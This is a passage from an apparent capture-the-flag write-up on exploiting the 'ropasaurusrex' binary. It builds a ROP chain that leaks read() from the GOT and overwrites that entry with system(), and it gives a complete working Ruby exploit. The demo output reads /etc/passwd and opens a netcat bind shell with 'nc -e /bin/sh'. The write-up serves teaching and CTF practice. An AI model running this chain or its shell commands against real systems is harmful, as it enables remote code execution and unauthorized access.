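Step 3 is plain arithmetic once write() has sent back the 4 raw bytes from read()’s pointer slot. In this sketch, SYSTEM_OFFSET is the objdump -T value shown earlier, but READ_OFFSET is an assumption: it was inferred by assuming the two gdb sessions in this post loaded libc at the same base (0xb7f48110 - 0xb7e89000). Look up read in objdump -T for your own libc instead of trusting it:

```ruby
SYSTEM_OFFSET = 0x39450   # objdump -T: system() inside libc.so.6
READ_OFFSET   = 0xbf110   # ASSUMPTION: inferred, verify against your libc

# write() sends the raw 4-byte pointer stored at 0x0804961c.
def system_from_leak(leaked_bytes)
  read_addr = leaked_bytes.unpack("V").first   # little-endian dword
  libc_base = read_addr - READ_OFFSET
  libc_base + SYSTEM_OFFSET
end

# Simulated leak, using the read() address gdb printed above.
leak = [0xb7f48110].pack("V")
system_addr = system_from_leak(leak)
puts format("system() is at 0x%08x", system_addr)

# These 4 bytes are what gets sent back to overwrite the pointer.
reply = [system_addr].pack("V")
```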

To call system(), we’re gonna have to write the address of system() somewhere in memory, then call it. The easiest way to do that is to overwrite read()’s entry in the global offset table (GOT), the pointer at 0x0804961c that the read() stub in the .plt jumps through, then call read().

By now, you’re probably confused. Don’t worry, I was too. I was shocked I got this working. :)

Let’s just go for broke now and get this working! Here’s the stack frame we want:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- system()'s frame [7]
|      void *arg       | 
+----------------------+
|   [return address]   | 
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame [6]
|  [address of read]   | - this will actually jump to system()
+----------------------+

+----------------------+ <-- second read()'s frame [5]
|     size_t count     | - 4 bytes (the size of a 32-bit address)
+----------------------+
|      void *buf       | - address of read()'s GOT entry (0x0804961c), so we can overwrite it
+----------------------+
|        int fd        | - 0 (stdin)
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame [4]
|  [address of read]   |
+----------------------+

+----------------------+ <-- write()'s frame [3]
|     size_t count     | - 4 bytes (the size of a 32-bit address)
+----------------------+
|      void *buf       | - The address containing a pointer to read()
+----------------------+
|        int fd        | - 1 (stdout)
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame [2]
|  [address of write]  |
+----------------------+

+----------------------+ <-- read()'s frame [1]
|     size_t count     | - strlen(cmd) + 1 (cmd plus its NUL terminator)
+----------------------+
|      void *buf       | - writeable memory
+----------------------+
|        int fd        | - 0 (stdin)
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Holy smokes, what’s going on!?

Let’s start at the bottom and work our way up! I tagged each frame with a number for easy reference.

Frame [1] we've seen before. It reads cmd from the socket into our writable memory. Frame [2] is a standard pop/pop/pop/ret to clean up after read().

Frame [3] uses write() to write the address of the read() function to the socket. Frame [4] uses a standard pop/pop/pop/ret to clean up after write().
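To see how the pop/pop/pop/ret gadget carries execution from one frame to the next, here is a toy tracer in Ruby. It doesn't execute anything. It just models the 32-bit stack as an array of words and follows the rules of `ret` (pop the next word into eip) and `pop` (skip one word). The addresses are the ones used by the exploit in this post, `trace_chain` is a hypothetical name, and the command length of 16 is arbitrary. It runs on the overwritten return address plus frames [1] through [3]:

```ruby
# Toy model of a 32-bit x86 ROP chain unwinding; nothing is executed.
# stack[0] is the word that overwrote the saved return address, and each
# higher index is the next 4-byte word up the stack.
READ_PLT  = 0x0804832c
WRITE_PLT = 0x0804830c
PPPR      = 0x080484b6
BUF       = 0x08049530
READ_GOT  = 0x0804961c

FUNCTIONS = { READ_PLT => "read", WRITE_PLT => "write" }

# Returns [name, args] for each function the chain reaches (up to 3 args each).
def trace_chain(stack)
  calls = []
  esp = 0
  eip = stack[esp] # the vulnerable function's own `ret`
  esp += 1
  loop do
    if eip == PPPR
      esp += 3 # pop; pop; pop: discard the previous call's three arguments
    elsif FUNCTIONS.key?(eip)
      # On entry, stack[esp] is the return address and the arguments follow it.
      calls << [FUNCTIONS[eip], stack[esp + 1, 3] || []]
    else
      break # unknown address: stop tracing
    end
    break if esp >= stack.length
    eip = stack[esp] # `ret`: pop the next word into eip
    esp += 1
  end
  calls
end

cmd_len = 16 # arbitrary command length for the example
chain = [
  READ_PLT,              # overwritten saved return address: "call" read()
  PPPR, 0, BUF, cmd_len, # frame [1]: read()'s return address and arguments
  WRITE_PLT,             # frame [2]: where pop/pop/pop/ret returns to
  PPPR, 1, READ_GOT, 4   # frame [3]: write()'s return address and arguments
]

trace_chain(chain).each do |name, args|
  puts "#{name}(#{args.map { |a| format('0x%x', a) }.join(', ')})"
end
```

The trace reaches read() and then write(): after each call, the gadget skips that call's three arguments so the next `ret` lands on the next function address.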

Frame [5] reads another address over the socket and writes it to memory. This address is going to be the address of system(). Writing it to memory works because of how read() is called. Disassemble the read() address we've been using in gdb (0x0804832C) and you'll see this:

(gdb) x/i 0x0804832C
0x804832c <read@plt>:   jmp    DWORD PTR ds:0x804961c

read@plt is actually just an indirect jump through the pointer stored at 0x804961c (read()'s GOT entry)! So if we change the value stored at 0x804961c and then jump to read@plt anyway, we can jump anywhere we want! That's why frame [3] reads the value at that address (the actual address of read() in libc) and frame [5] writes a new address there.
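To make the indirect jump concrete, here is a toy Ruby model, not real memory access. A Hash stands in for process memory, and the hypothetical `plt_read` mimics `jmp DWORD PTR ds:0x804961c`: it doesn't go to a fixed address, it goes to whatever value is currently stored in the slot. The libc addresses are the read() and system() values used in this post:

```ruby
# Toy model of read@plt's indirect jump; a Hash stands in for process memory.
READ_GOT = 0x0804961c # the slot read@plt jumps through
# libc addresses from this post's debugging session
LIBC = { 0xb7f48110 => "read", 0xb7ec2450 => "system" }

# Like `jmp DWORD PTR ds:0x804961c`: the target is loaded from memory on
# every call, so whoever controls that slot controls where the call lands.
def plt_read(memory)
  LIBC.fetch(memory.fetch(READ_GOT), "unknown")
end

memory = { READ_GOT => 0xb7f48110 } # slot after the dynamic linker resolved read()
puts plt_read(memory)                # the stub reaches read()

memory[READ_GOT] = 0xb7ec2450        # what frame [5]'s read() does with our 4 bytes
puts plt_read(memory)                # the same stub now reaches system()
```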

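Frame [6] is a standard pop/pop/pop/ret construct, with a small difference: the pop/pop/pop/ret returns to 0x804832c, which is read()'s .plt entry. Since we overwrote the pointer that this entry jumps through with the address of system(), this call actually goes to system()! Frame [7] is system()'s own frame: a dummy return address (0x44444444 in the code) followed by a pointer to cmd in our writable memory.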
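Since the stack grows toward lower addresses, the diagram above runs from high addresses (top) to low (bottom), but the overflow writes the payload from low to high. The exploit below lists the words top-down and then calls `.reverse`. As an alternative sketch, a hypothetical `frame` helper can emit each call in the order the bytes land on the stack. The addresses are the exploit's, the command is just an example, and `"V*"` packs little-endian 32-bit words:

```ruby
READ_PLT  = 0x0804832c
WRITE_PLT = 0x0804830c
PPPR      = 0x080484b6
BUF       = 0x08049530
READ_GOT  = 0x0804961c

# Hypothetical helper: one 32-bit cdecl call in a ROP chain is the function's
# address, then the address it returns to, then its arguments.
def frame(func, ret, *args)
  [func, ret, *args]
end

# Words in stack order, lowest address first.
def build_chain(cmd_len)
  [
    frame(READ_PLT,  PPPR, 0, BUF, cmd_len), # saved-EIP overwrite + [1]: read(0, buf, len)
    frame(WRITE_PLT, PPPR, 1, READ_GOT, 4),  # [2] + [3]: write(1, read's GOT slot, 4)
    frame(READ_PLT,  PPPR, 0, READ_GOT, 4),  # [4] + [5]: read(0, read's GOT slot, 4)
    frame(READ_PLT,  0x44444444, BUF)        # [6] + [7]: read@plt, now system(buf)
  ].flatten
end

cmd = "id\0" # example command, NUL-terminated
payload = "A" * 140 + build_chain(cmd.length).pack("V*")
puts payload.bytesize
```

Building the list bottom-up removes the need for `.reverse`, and the resulting 18 words come out in the same order as the exploit's reversed array.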

Final code

Whew! That’s quite complicated. Here’s code that implements the full exploit for ropasaurusrex, bypassing both DEP and ASLR:

require 'socket'

abort("usage: ruby sploit.rb <command>") unless ARGV[0]

s = TCPSocket.new("localhost", 4444)

# The command we'll run, NUL-terminated so system() sees a C string
cmd = ARGV[0] + "\0"

# Writable memory (from objdump -x)
buf = 0x08049530

# From objdump -D ./ropasaurusrex | grep read
read_addr = 0x0804832C
# From objdump -D ./ropasaurusrex | grep write
write_addr = 0x0804830C
# From gdb, "x/x system" (only valid with ASLR off; not used below)
system_addr = 0xb7ec2450
# From objdump, "pop/pop/pop/ret"
pppr_addr = 0x080484b6

# The GOT slot that read()'s .plt entry jumps through
read_addr_ptr = 0x0804961c

# The difference between read() and system()
# Calculated as read (0xb7f48110) - system (0xb7ec2450)
# Note: This is the one number that needs to be calculated using the
# target version of libc rather than my own!
read_system_diff = 0x85cc0

# Generate the payload. The list is written top-down (highest address
# first, like the diagram) and reversed before packing.
payload = "A"*140 +
  [
    # system()'s stack frame
    buf,         # writable memory (cmd buf)
    0x44444444,  # system()'s return address

    # pop/pop/pop/ret's stack frame
    # Note that this calls read_addr, whose GOT slot is overwritten with a
    # pointer to system() by the previous stack frame
    read_addr,   # (this will become system())

    # second read()'s stack frame
    # This reads the address of system() from the socket and overwrites
    # read()'s GOT slot with it, so calls to read() end up going to
    # system()
    4,           # length of an address
    read_addr_ptr, # address of read()'s GOT slot
    0,           # stdin
    pppr_addr,   # read()'s return address

    # pop/pop/pop/ret's stack frame
    read_addr,

    # write()'s stack frame
    # This frame gets the address of the read() function from its GOT slot
    # and writes it to stdout
    4,           # length of an address
    read_addr_ptr, # address of read()'s GOT slot
    1,           # stdout
    pppr_addr,   # write()'s return address

    # pop/pop/pop/ret's stack frame
    write_addr,

    # read()'s stack frame
    # This reads the command we want to run from the socket and puts it
    # in our writable "buf"
    cmd.length,  # number of bytes
    buf,         # writable memory (cmd buf)
    0,           # stdin
    pppr_addr,   # read()'s return address

    read_addr # Overwrite the original return
  ].reverse.pack("I*") # Convert a series of 'ints' to a string

# Write the 'exploit' payload
s.write(payload)

# When our payload calls read() the first time, this is read
s.write(cmd)

# Get the output of the write() call: the actual address of read() in libc
this_read_addr = s.read(4).unpack("I").first

# Calculate the address of system()
this_system_addr = this_read_addr - read_system_diff

# Write the address back, where it'll be read() into the correct place by
# the second read() call
s.write([this_system_addr].pack("I"))

# Finally, read the result of the actual command
puts(s.read())

# Clean up
s.close()

And here it is in action:

$ ruby sploit.rb "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]

You can, of course, change cat /etc/passwd to anything you want (including a netcat listener!)

ron@debian-x86 ~ $ ruby sploit.rb "pwd"
/home/ron
ron@debian-x86 ~ $ ruby sploit.rb "whoami"
ron
ron@debian-x86 ~ $ ruby sploit.rb "nc -vv -l -p 5555 -e /bin/sh" &
[1] 3015
ron@debian-x86 ~ $ nc -vv localhost 5555
debian-x86.skullseclabs.org [127.0.0.1] 5555 (?) open
pwd
/home/ron
whoami
ron

Conclusion

And that’s it! We just wrote a reliable, DEP/ASLR-bypassing exploit for ropasaurusrex.

Feel free to comment or contact me if you have any questions!